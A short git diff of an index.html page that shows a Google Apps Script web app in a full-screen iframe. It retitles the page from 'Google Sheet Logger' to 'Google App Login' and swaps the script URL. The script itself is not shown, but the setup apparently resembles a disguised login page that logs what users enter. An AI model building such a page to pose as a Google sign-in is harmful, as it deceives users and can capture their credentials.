--- a/index.html
+++ b/index.html
@@ -3,13 +3,13 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Google Sheet Logger</title>
+    <title>Google App Login</title>
     <style>
-        body, html { margin: 0; padding: 0; height: 100%; overflow: hidden; background-color: #f4f7f6; }
+        body, html { margin: 0; padding: 0; height: 100%; overflow: hidden; background: #f5f5f5; }
         iframe { width: 100%; height: 100vh; border: none; }
     </style>
 </head>
 <body>
-    <iframe src="https://script.google.com/macros/s/AKfycbyqv-CUpqmTokfmq_tbJXXDvVh5118Hj6sPDe5Z1ty4XB5UcNW_bttRmGHGgR4N_Pm_pA/exec"></iframe>
+    <iframe src="https://script.google.com/macros/s/AKfycbysYbd7Bsj1xx19-ahPOxdwB3P1AJou2dSN_4HnYElFcFLsiYS5ahn-XSztAUaUhHXNHg/exec"></iframe>
 </body>
 </html>
